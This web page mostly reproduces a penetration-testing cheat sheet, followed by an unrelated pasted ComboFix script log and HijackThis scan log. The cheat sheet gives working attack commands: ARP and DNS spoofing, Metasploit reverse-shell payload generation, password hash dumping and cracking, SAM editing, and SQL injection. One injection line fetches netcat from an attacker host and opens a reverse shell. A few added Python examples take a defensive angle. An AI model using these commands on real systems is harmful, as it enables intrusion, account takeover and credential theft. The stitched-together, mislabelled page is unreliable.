Grep For Windows 2000
Wed, 28 Oct 2009 07:09:38 +0000
Table of Contents:
I. Networking
II. Services
III. Basics
IV. Footprinting
V. Scanning
VI. Windows Enumeration
VII. ARP Spoofing
VIII. Exploits
IX. Metasploit
What to do after gaining a remote shell
X. TFTP
XI. Netcat
XII. Passwords
XIII. Physical Access
XIV. SQL Injection
XV. Alternate Data Streams
XVI. A White Hat’s Pen Test
Networking:
Renew dynamic IP address:
dhcpcd -k release IP address
ifconfig eth0 up bring up the NIC
dhcpcd get a new IP address
Static IP address:
ifconfig eth0 192.168.0.100/24 set IP address & subnet mask
route add default gw 192.168.0.1 set default gateway
echo nameserver 192.168.0.1 > /etc/resolv.conf set DNS server
Backtrack 4 config:
/etc/init.d/networking start get a new IP address
/etc/init.d/wicd start start wireless adapter
Services:
Apache server:
apachectl start start server on TCP port 80
apachectl stop stop server
SSH server:
sshd-generate generate ssh keys
/usr/sbin/sshd start server on TCP port 22
pkill sshd stop server
ssh user@targetIP
TFTP server:
atftpd --daemon --port 69 /tmp/ start server on UDP port 69 with a root directory of /tmp
pkill tftpd stop server
VNC server:
vncserver start server on TCP port 5901
pkill Xvnc stop server
Check what ports are listening:
netstat -ant show listening TCP ports
netstat -anu show listening UDP ports
netstat -ant | grep 22 verify ssh has started
netstat -anu | grep 69 verify tftp has started
Basics:
Mount a local hard drive:
mount /dev/hda1 /mnt/hda1
ls -l /mnt/hda1
Mount a Windows network share:
share
share admin 10.1.1.2 c$
Enter a password for the remote share.
ls -l /mnt/share/
umount /mnt/share umount share
Edit a file:
nano test.sh create a new file and open it
Ctrl-X exit
Y save modified buffer
Enter write changes
chmod 755 test.sh make the file executable
./test.sh run the file
Compile a program:
gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom
Install a new program:
tar zxvf program.tar.gz
bzip2 -cd program.tar.bz2 | tar xvf - method 2, for .tar.bz2 archives
cd to the new program folder
./configure
make
su root
make install
Footprinting:
Whois:
whois target.com contact info, emails, dates, name servers
ping www.target.com IP address of web server
whois targetIP network range
DNS:
dig target.com any
A host, maps a domain name to an IP address
PTR pointer, maps an IP address to a domain name
NS name server, server name for a delegated zone
SOA start of authority, zone transfer and record caching
SRV service locator, used to locate services in the network
MX mail exchanger, mail servers for the domain
host -l target.com zone transfer
Scanning:
scanrand -b10M targetIP:quick
nmap:
-sS TCP SYN scan or Stealth, half open (default)
-sT TCP full connect (very noisy)
-sU UDP scan
-PS SYN packet discovery (best against stateful firewalls)
-PA ACK packet discovery (best against stateless firewalls)
-PN don’t ping
-n no reverse DNS lookup
-A combines -O and -sV
-O OS fingerprinting
-sV service version (banner)
-p ports to scan (T:port,U:port)
-T timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane
-iL input list of hosts to scan
-oG grepable output to a file
nmap -sS -PN -n targetIP
nmap -sU -PN -n targetIP
nmap -sT -PN -n targetIP -A -p <open ports> -T5 -oG scan.txt
nmap -sS -p 135,139,445 targetIP
nmap -sS -p T:1433,U:1434 targetIP
amap:
Take the results from nmap and check for services on uncommon ports.
amap -i scan.txt
OS Fingerprinting:
p0f -i eth0 -U -p use interface eth0, don't display unknown signatures, promiscuous
point a browser to the targetIP read traffic on p0f
xprobe2 targetIP
Banner Grabbing:
nc targetIP port check if the port is open
nc 10.1.1.2 80
telnet targetIP port telnet may yield slightly different results
HEAD / HTTP/1.0
wget targetIP downloads the index.html file
cat index.html | more view file one page at a time, space bar for next page
q exit file
Windows Enumeration:
nmap -sS -p 139,445 targetIP
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP check to see if NetBIOS is enabled
smbgetserverinfo -i targetIP name, OS and workgroup
smbdumpusers -i targetIP list users
smbclient -L //targetIP list shares
Using Windows
net use \\targetIP\ipc$ "" /u:"" start a NULL session
net view \\targetIP view shares
smbclient:
smbclient -L hostName -I targetIP enumerate shares
smbclient //hostName/share -I targetIP -U "" connect to an open share with a blank user name
smbclient //hostName/share -I targetIP -U admin connect to a share with user name admin
rpcclient:
rpcclient targetIP -U "" start a NULL session
netshareenum enumerate shares
enumdomusers enumerate users
lsaenumsid enumerate domain SIDs
queryuser RID user info, try 500, 501, 1000, 1001
createdomuser create user account
ARP Spoofing:
ettercap:
nano /usr/local/etc/etter.conf
Under the Linux section, uncomment both lines under iptables.
Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this two times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
dsniff -i eth0
urlsnarf -i eth0
msgsnarf -i eth0
driftnet -i eth0
dns spoofing:
nano /usr/local/share/ettercap/etter.dns
Edit the Microsoft lines (target URL) to redirect to the attacker.
Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
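On the victim side the poisoning described above has two visible symptoms: the gateway's IP suddenly resolves to a different MAC, and one MAC answers for two IPs at once. The following is an added example, not part of the original cheat sheet, that parses `arp -an` style output and flags both; the two snapshots, the interface and every address in them are constructed.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed snapshots in the style of Linux `arp -an` output (all addresses made up).
# BASELINE_ARP was taken on a quiet network; POISONED_ARP during an ARP-poisoning run
# in which the host at 192.168.0.21 answers for the gateway 192.168.0.1.
BASELINE_ARP = """\
? (192.168.0.1) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.0.20) at aa:bb:cc:dd:ee:01 [ether] on eth0
? (192.168.0.21) at aa:bb:cc:dd:ee:02 [ether] on eth0
? (192.168.0.30) at <incomplete> on eth0
"""
POISONED_ARP = """\
? (192.168.0.1) at AA:BB:CC:DD:EE:02 [ether] on eth0
? (192.168.0.20) at aa:bb:cc:dd:ee:01 [ether] on eth0
? (192.168.0.21) at aa:bb:cc:dd:ee:02 [ether] on eth0
"""

# One resolved entry: "(ip) at mac"; <incomplete> entries do not match and are skipped.
ARP_ENTRY = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def parse_arp_table(text: str) -> Dict[str, str]:
    """Return {ip: mac} for every resolved entry; MACs are normalised to lower case."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = ARP_ENTRY.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_mac_changes(baseline: Dict[str, str], current: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """IPs whose MAC differs from the baseline, as (ip, old_mac, new_mac).

    A legitimate NIC replacement also triggers this, so it is a lead to confirm, not proof.
    """
    return [(ip, baseline[ip], current[ip])
            for ip in sorted(baseline)
            if ip in current and current[ip] != baseline[ip]]


def find_duplicate_macs(table: Dict[str, str]) -> Dict[str, List[str]]:
    """MACs that answer for more than one IP: the poisoner's MAC sits behind the gateway IP and its own."""
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_alert(baseline: Dict[str, str], current: Dict[str, str], gateway_ip: str) -> Optional[str]:
    """Alert text when the gateway's MAC changed, naming the host that owned the new MAC before, if known."""
    old, new = baseline.get(gateway_ip), current.get(gateway_ip)
    if old is None or new is None or old == new:
        return None
    suspects = [ip for ip, mac in baseline.items() if mac == new and ip != gateway_ip]
    who = suspects[0] if suspects else "unknown host"
    return f"gateway {gateway_ip} moved from {old} to {new} (MAC previously seen on {who})"


if __name__ == "__main__":
    base = parse_arp_table(BASELINE_ARP)
    now = parse_arp_table(POISONED_ARP)
    for ip, old, new in find_mac_changes(base, now):
        print(f"MAC change: {ip} {old} -> {new}")
    for mac, ips in find_duplicate_macs(now).items():
        print(f"duplicate MAC {mac} claimed by {', '.join(ips)}")
    print(gateway_alert(base, now, "192.168.0.1"))
```

Run it periodically against a stored baseline and page on the gateway alert; the duplicate-MAC check is the stronger signal because a genuine hardware swap changes one mapping without making another host share the new MAC. Static ARP entries for the gateway or dynamic ARP inspection on the switch stop the attack rather than just detecting it.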
Exploits:
cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i [exploit]
Some exploits may be written for compilation under Windows, while others for Linux.
You can identify the environment by inspecting the headers.
cat exploit | grep "#include"
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h
Keep only the files that include sys/ headers, which leaves the Linux-based exploits:
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u
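The pipeline above keys on a single string (`sys`) and files anything that matches as Linux, so a source that includes both `windows.h` and a `sys/` header behind `#ifdef` ends up in the wrong pile. The following added example, not part of the original page, applies the header lists from this section to each file's actual `#include` lines and labels it windows, linux, both or unknown; the four sample sources are constructed. One caveat: `string.h` is listed above under Windows, but it is standard C and appears in Linux sources just as often, so the classifier below leaves it out and counts only headers specific to one platform.

```python
import re
from typing import Dict, List, Set

# Header lists from the cheat sheet above. string.h is standard C and is deliberately
# left out of the Windows set so it is never taken as platform evidence.
WINDOWS_HEADERS: Set[str] = {"process.h", "winbase.h", "windows.h", "winsock2.h"}
LINUX_HEADERS: Set[str] = {"arpa/inet.h", "fcntl.h", "netdb.h", "netinet/in.h",
                           "sys/socket.h", "sys/types.h", "unistd.h"}

# Matches `#include <x>` and `#include "x"`, tolerating spaces after the `#`.
INCLUDE_RE = re.compile(r'^\s*#\s*include\s*[<"]([^>"]+)[>"]', re.MULTILINE)


def included_headers(source: str) -> List[str]:
    """Every header a C source pulls in, in order of appearance."""
    return INCLUDE_RE.findall(source)


def classify_source(source: str) -> str:
    """'windows', 'linux', 'both' or 'unknown', judged from platform-specific headers only."""
    headers = set(included_headers(source))
    wants_windows = bool(headers & WINDOWS_HEADERS)
    wants_linux = bool(headers & LINUX_HEADERS)
    if wants_windows and wants_linux:
        return "both"
    if wants_windows:
        return "windows"
    if wants_linux:
        return "linux"
    return "unknown"


def classify_many(sources: Dict[str, str]) -> Dict[str, str]:
    """Map file name -> platform label, in a stable (sorted) order for reporting."""
    return {name: classify_source(src) for name, src in sorted(sources.items())}


# Constructed sample sources (placeholders, not real exploit code): a Winsock client,
# a BSD-socket client, a portable file with both sets behind #ifdef, and plain C.
SAMPLES: Dict[str, str] = {
    "a.c": "#include <winsock2.h>\n#include <windows.h>\n#include <string.h>\nint main(void){return 0;}\n",
    "b.c": "#include <sys/types.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n#include <string.h>\nint main(void){return 0;}\n",
    "c.c": "#ifdef _WIN32\n# include <winsock2.h>\n#else\n# include <sys/socket.h>\n# include <unistd.h>\n#endif\n#include <string.h>\nint main(void){return 0;}\n",
    "d.c": "#include <stdio.h>\n#include <string.h>\nint main(void){return 0;}\n",
}

if __name__ == "__main__":
    for name, label in classify_many(SAMPLES).items():
        print(f"{name}: {label}")
```

To run it over a directory, read each `.c` file into the `sources` dict and call `classify_many`; the "both" and "unknown" buckets are the ones the one-line grep silently misfiles.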
Metasploit:
svn update update framework
Web Interface:
./msfweb open a browser to 127.0.0.1:55555
Console:
./msfconsole
help
show encoders, nops, exploits, payloads, auxiliary
search
use
show options
set e.g. set RHOST 192.168.1.3
show payloads
set PAYLOAD
show options
set e.g. set LHOST 192.168.1.2
show targets
set TARGET e.g. set TARGET 0
exploit
Interactive sessions:
sessions -l list active sessions
sessions -i 4 interact with session 4
sessions -k 4 kill session 4
Ctrl-Z background a session
Ctrl-C kill a session
jobs list exploit jobs running
jobs -K kill all jobs
Auxiliary scanners:
show auxiliary
use
set
run
scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login
Payloads:
Attacker behind firewall: bind shell
Target behind firewall: reverse shell
Meterpreter
Automated:
db_import_nessus_nbe import Nessus results in NBE format
db_import_nmap_xml import nmap results in XML format (-oX)
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest delete old database called pentest
db_create pentest create a new database call pentest
db_nmap targetIP run nmap through the framework and store results in database
db_hosts show hosts discovered
db_services show services running on each host
db_autopwn show options
db_autopwn -t -p -e select modules based on open ports, show matching exploits, exploit
Command Line Interface:
./msfcli | grep -i search for an exploit or auxiliary
./msfcli S summary info
./msfcli = PAYLOAD= E
Payload generator:
./msfpayload
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
Encode shellcode:
./msfencode
Pipe the output of msfpayload into msfencode, show bad characters and list available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l
Choose the PexFnstenvMor encoder and format the output to C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c
What to do after gaining a remote shell:
hostname name of computer
net users list users
net user x hack /add add user "x" with password "hack"
net user x /add add user "x" with NO password
net localgroup list security groups
net localgroup administrators list users in Administrators group
net localgroup administrators x /add add user “x” to Administrators group
Don’t use interactive programs like FTP from a remote shell
TFTP:
attack box 10.1.1.2
cp /pentest/windows-binaries/tools/nc.exe /tmp/
target box
tftp -i 10.1.1.2 GET nc.exe
TFTP copies files with the read-only attribute set, so to delete the file:
attrib -r nc.exe
del nc.exe
Netcat:
attacker: 10.1.1.1
target: 10.1.1.2
Port scanner:
nc -v -z 10.1.1.2 1-1024 scan ports 1 to 1024
Chat session:
target: nc -lvp 4444 start Netcat and listen verbosely on port 4444
attacker: nc -v 10.1.1.2 4444
Transfer file to target:
target: nc -lvp 4444 > output.txt
attacker: nc -v 10.1.1.2 4444
Passwords:
words wordlist file
cat words | wc -l count the entries in the wordlist
About 306,000 passwords.
Brute force:
ftp with a user name ftp
hydra -l ftp -P words -v targetIP ftp
pop3 with a user name muts
hydra -l muts -P words -v targetIP pop3
snmp
hydra -P words -v targetIP snmp
Microsoft VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
Use wget to download specific files.
wget -r www.target.com --accept=pdf (-f switch will read pwdump files)
wyd.pl -o output.txt www.target.com/
cat output.txt | more
SAM file:
%SYSTEMROOT%\system32\config
%SYSTEMROOT%\repair backup copy not locked by the OS
Dumping hashes:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x where x is the channel created
C:\WINDOWS\system32> pwdump \\127.0.0.1
John the Ripper:
Paste the hashes into a new file.
nano hash.txt
Delete unneeded accounts.
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
Rainbow Tables:
rcrack *.rt -f hash.txt
Physical Access:
Mount an NTFS partition in read/write mode:
Boot your box with Backtrack.
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1
Dump the SAM file:
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
cat hash.txt
Modify SAM file directly:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
* blank the password
Do you really wish to change it? y
Write hive files? y
umount /mnt/sda1
reboot
SQL Injection:
nmap -sS -p 1521 targetIP oracle
nmap -sS -p T:1433,U:1434 targetIP ms sql
Release Version of SqlServer.exe
SQL Server 2000 RTM 2000.80.194.0
SQL Server 2000 SP1 2000.80.384.0
SQL Server 2000 SP2 2000.80.534.0
SQL Server 2000 SP3 2000.80.760.0
SQL Server 2000 SP3a 2000.80.760.0
SQL Server 2000 SP4 2000.80.00.2039
SQL Server 2005 RTM 2005.90.1399
SQL Server 2005 SP1 2005.90.2047
SQL Server 2005 SP2 2005.90.3042
Authentication bypass:
' or 1=1-- the double dash comments out the rest of the SQL query, so everything after it is ignored
Enumerating table names:
' having 1=1--
' group by table having 1=1--
' group by table, table2 having 1=1--
' group by table, table2, table3 having 1=1--
Enumerating column types:
union select sum(column) from table--
union select sum(column2) from table--
Adding data:
' ; insert into table values('value','value2','value3')--
MS SQL stored procedure:
Output the database info into an html file, that you can view with a browser.
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; --
www.target.com/test.html
Run ipconfig on target and write to a file, that you can view with a browser.
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' ;--
www.target.com/test.txt
Upload netcat and spawn a reverse shell.
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; --
attacker: nc -lvp 53
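The authentication bypass at the top of this section works only because the application pastes the user's text straight into the SQL string. The following is an added example, not from the original cheat sheet, that puts the vulnerable login check next to the parameterised one, using Python's in-memory sqlite3 as a stand-in for the MS SQL server discussed above; the users table and its passwords are constructed (a real application would store password hashes, not clear text).

```python
import sqlite3
from typing import Tuple


def make_demo_db() -> sqlite3.Connection:
    """In-memory users table populated with constructed sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def vulnerable_query(username: str, password: str) -> str:
    """The SQL text a string-concatenating login check actually sends to the database."""
    return ("SELECT COUNT(*) FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Builds the query by concatenation: a quote and -- in the input rewrite the WHERE clause."""
    count = conn.execute(vulnerable_query(username, password)).fetchone()[0]
    return count > 0


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with bound parameters: the driver passes the input as data, never as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    count = conn.execute(sql, (username, password)).fetchone()[0]
    return count > 0


def compare(username: str, password: str) -> Tuple[bool, bool]:
    """(vulnerable_result, parameterized_result) for one credential pair on a fresh database."""
    conn = make_demo_db()
    try:
        return (login_vulnerable(conn, username, password),
                login_parameterized(conn, username, password))
    finally:
        conn.close()


if __name__ == "__main__":
    for user, pw in [("alice", "s3cret"), ("alice", "wrong"), ("' or 1=1--", "anything")]:
        print(repr(user), repr(pw), "->", compare(user, pw))
        print("   SQL sent by the vulnerable version:", vulnerable_query(user, pw))
```

With the bypass string as the user name the concatenated query becomes `... WHERE username = '' or 1=1--' AND password = '...'`: the `or 1=1` matches every row and the `--` discards the password check, so the vulnerable version returns true while the parameterised version looks for a user literally named `' or 1=1--` and returns false. Parameter binding is the fix for every variant in this section, including the stored-procedure calls, because the database never parses user input as SQL.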
Alternate Data Streams:
Hide netcat inside a text file. Note netcat must be located in the current directory.
echo "This is a test" > test.txt
type nc.exe > test.txt:nc.exe
del nc.exe
start ./test.txt:nc.exe
A White Hat’s Pen Test by Muts:
nslookup
set type=ns
set type=mx
nmap -sS
nmap -sU
nc -v target.com 23
snmpenum
Solarwinds
tftp the router config file
Use a perl script to decrypt the passwords
Find internal mail server in config file.
nc -n internalserver.com 80
Edit the config file to open more ports on the router: 135, 139, 445, 1000
Use Metasploit to send RPC exploit
tftp -i attackIP GET pwdump4.exe
pwdump4.exe \\127.0.0.1 > hashes.txt
tftp -i attackIP PUT hashes.txt
Crack hashes with rainbow table.
Use Remote Desktop to connect to server
Still nothing? So I searched for the log in my C: drive and there are two folders and a text document. They were created when I installed Combofix. The folders are called "Qoobox", "32788R22FWJFW" and the text doc is called "Bug" and I posted it below:
32788R22FWJFW\swreg.exe import 32788R22FWJFW\EXE.reg
32788R22FWJFW\PEV.exe UZIP 32788R22FWJFW\License\pv_5_2_2.zip 32788R22FWJFW\
MOVE /Y 32788R22FWJFW\PV.exe 32788R22FWJFW\PV.cfxxe
32788R22FWJFW\PV.cfxxe -kf *.pif nircmd.* ANDRE.EXE TOLO.exe Merlin.scr jalang.exe jalangkung.exe jantungan.exe DOSEN.exe C3W3K4MPUS.exe cmd.exe
Killing '*.pif'
Killing 'nircmd.*'
"C:\32788R22FWJFW\nircmd.cfxxe" cmdwait 1700 exec hide "C:\WINDOWS\system32\cmd.execf" /c 32788R22FWJFW\prep.cmd (2600)
Killing 'ANDRE.EXE'
Killing 'TOLO.exe'
Killing 'Merlin.scr'
Killing 'jalang.exe'
Killing 'jalangkung.exe'
Killing 'jantungan.exe'
Killing 'DOSEN.exe'
Killing 'C3W3K4MPUS.exe'
Killing 'cmd.exe'
PUSHD "C:\32788R22FWJFW"
IF NOT EXIST pev.cfxxe COPY /Y pev.exe pev.cfxxe
1 file(s) copied.
IF NOT EXIST NircmdB.exe COPY /Y Nircmd.cfxxe NircmdB.exe
1 file(s) copied.
SET "Comspec=C:\WINDOWS\system32\cmd.execf"
IF NOT EXIST C:\WINDOWS\system32\cmd.exe GOTO Not_NT
IF EXIST OsVer EXIT
VER 1>OsVer
GREP.cfxxe -F "5.2." OsVer
IF 1 == 0 GOTO Not_NT
GREP.cfxxe -F "5.1.2" OsVer 1>XP.mac
IF 0 == 0 GOTO NT
GREP.cfxxe -isq "ProductType.*WinNT" WinNT00 || GOTO Not_NT
SED.cfxxe "/^PATH=/I!d; s///; s/\x22//g" Oripath 1>OriPath00
PEV.EXE -rtf -s+901 .\OriPath00 && (
SED.cfxxe -r "s/\x22//g; s/(.{900}).*/\1/; s/;[^;]*$//" OriPath00 1>OriPath01
FOR /F "TOKENS=*" %G IN (OriPath01) DO @SET "PATH=C:\32788R22FWJFW;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\wbem;%G"
)
IF NOT EXIST OriPath01 FOR /F "TOKENS=*" %G IN (OriPath00) DO SET "PATH=C:\32788R22FWJFW;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\wbem;%G"
SET "PATH=C:\32788R22FWJFW;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\wbem;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\wbem;C:\PCDRSDK\WINDSAPI\bin;C:\WINDOWS\system32\gs\gs7.05\bin"
Killing 'runonce.exe'
Killing 'grpconv.exe'
Killing 'procmon.exe'
Killing 'ANDRE.EXE'
Killing 'TOLO.exe'
Killing 'Merlin.scr'
Killing 'jalang.exe'
Killing 'jalangkung.exe'
Killing 'jantungan.exe'
Killing 'DOSEN.exe'
Killing 'C3W3K4MPUS.exe'
pv: No matching processes found
PEV -rtf --c:##5# .\* and { License.exe or 32788R22FWJFW.exe or OsVer.exe or WinNT.exe or N_.exe } 1>temp00 && (
PV -o%f * 1>temp01
PEV -tf -t!o --files:temp01 --c:##5#b#f# 1>temp02
GREP -Fif temp00 temp02 1>temp03
SED "/.* /!d; s///" temp03 1>temp04
SED ":a; $!N; s/\n/\x22 \x22/; ta; s/.*/\x22&\x22/" temp04 1>temp05
FOR /F "TOKENS=*" %G IN (temp05) DO @NIRCMD KILLPROCESS %G
)
CALL :MDCheck
Could Not Find C:\32788R22FWJFW\md5sum00.pif
PEV -rtf -md5C589B205BC02BE2E1636B9448FF6D47C .\md5sum.pif || CALL :MDFaiL ChkSum_Fail
.\md5sum.pif
PEV -tf --files:files.pif --c:##5#b#f# 1>mdCheck00.dat
GREP -vs "^!MD5:" mdCheck00.dat 1>mdCheck0a.dat
GREP -Fvf md5sum.pif mdCheck0a.dat 1>mdCheck01.dat && CALL :MDFaiL
GOTO :EOF
=============================================
ALLUSERSPROFILE=C:\Documents and Settings\All Users
APPDATA=C:\Documents and Settings\Owner\Application Data
cfExt=cfxxe
CFLDR=32788R22FWJFW
Chksum=C589B205BC02BE2E1636B9448FF6D47C
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ROGERLAPTOP
ComSpec=C:\WINDOWS\system32\cmd.execf
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\Owner
KMD=CF14938.exe
LOGONSERVER=\\ROGERLAPTOP
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\32788R22FWJFW;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\wbem;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\wbem;C:\PCDRSDK\WINDSAPI\bin;C:\WINDOWS\system32\gs\gs7.05\bin
PATHEXT=.cfxxe;.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 15 Model 2 Stepping 4, GenuineIntel
PROCESSOR_LEVEL=15
PROCESSOR_REVISION=0204
ProgramFiles=C:\Program Files
PROMPT=$
Qrntn=C:\Qoobox\Quarantine
RKEY_=hklm\software\microsoft\windows nt\currentversion\windows
SESSIONNAME=Console
sfxcmd="C:\Documents and Settings\Owner\Desktop\2d45fty7er.exe"
sfxname=C:\Documents and Settings\Owner\Desktop\2d45fty7er.exe
SYSTEM=C:\WINDOWS\system32
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\Owner\LOCALS~1\Temp
TMP=C:\DOCUME~1\Owner\LOCALS~1\Temp
USERDOMAIN=ROGERLAPTOP
USERNAME=Owner
USERPROFILE=C:\Documents and Settings\Owner
windir=C:\WINDOWS
=============================================
IF NOT DEFINED sfxname GOTO END
GREP -F \ temp01 && CALL :Aux
GREP -Fi "C:\WINDOWS\system32\userinit.exe" Userinit00 || (SWREG ADD "hklm\software\microsoft\windows nt\currentversion\winlogon" /v Userinit /d "C:\WINDOWS\system32\userinit.exe," )
Userinit REG_SZ C:\WINDOWS\system32\userinit.exe,
CALL LANG.bat
Active code page: 1252
SET SfxCmd 1>SET00
SED -r "/SfxCmd=/I!d; s///; s/\s*$//; s/^(\x22[^\x22]*\x22|[^\x22]\S*) +//; s/^\x22*C:\\Documents and Settings\\Owner\\Desktop\\2d45fty7er.exe\x22*//I; s/^([^\x22]\S*)/@SET SfxCmd=\x22\1\x22/; s/^(\x22.*)/@SET SfxCmd=\1/" SET00 1>sfx.cmd
DEL /A/F SET00
ATTRIB +R "C:\Documents and Settings\Owner\Desktop\2d45fty7er.exe"
CALL sfx.cmd
CALL AV.cmd
SET /a AVCount+=1
CSCRIPT.exe //NOLOGO //E:VBSCRIPT //B //T:08 av.vbs
IF NOT EXIST AvBlack00 GREP -Fisf AVBlack resident.txt 1>AvBlack00 && (
SED -r "s/\x22//g; s/.*\) //; s/.*(\{.{8}-.{4}-.{4}-.{4}-.{12}\}).*/\1/" AvBlack00 1>AvBlack01
FOR /F "TOKENS=*" %G IN (AvBlack01) DO @CSCRIPT.EXE //NOLOGO //E:VBSCRIPT //T:5 wmi_rem.vbs "%~G"
CSCRIPT.exe //NOLOGO //E:VBSCRIPT //B //T:08 av.vbs
)
GREP -Fivf AVWhite resident.txt | GREP -E "^(AV|SP): .*enabled\* \(" 1>AVChk && (
SED -r "s/^AV:/antivirus: /; s/^SP:/antispyware: /; s/ \*(On-access scanning |)enabled\*.*//" AVChk | SED ":a; $!N;s/\n/~n/;ta" 1>AVChkB
NIRCMD LOOP 2 80 BEEP 3000 200
IF 1 LEQ 1 FOR /F "TOKENS=*" %G IN (AVChkB) DO @NIRCMD INFOBOX "ComboFix has detected the following real time scanner(s) to be active:~n~n%G~n~nAntivirus and intrusion prevention programs are known to interfere~nwith ComboFix's running. This may lead to unpredictable results or~npossible machine damage.~n~nPlease disable these scanners before clicking 'OK'." "Warning !!" "" && GOTO Av-check
IF 1 GTR 1 FOR /F "TOKENS=*" %G IN (AVChkB) DO @NIRCMD INFOBOX "%G~n~nThe above real time scanner(s) are still active but ComboFix shall~ncontinue to run. Kindly note that this is at your own risk" "Warning !!" ""
)
_______________________________________________________________________
And I got tired of waiting so I ran the Hijackthis log soon after and here it is:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:19:31 PM, on 8/28/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16876)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\Program Files\Sprint\Sprint PCS Connection Manager\CMSPCSUtilSvc.exe
C:\WINDOWS\System32\svchost.exe
\?\globalroot\C:\WINDOWS\system32\msihost.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\cmd.execf
C:\32788R22FWJFW\grep.cfxxe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
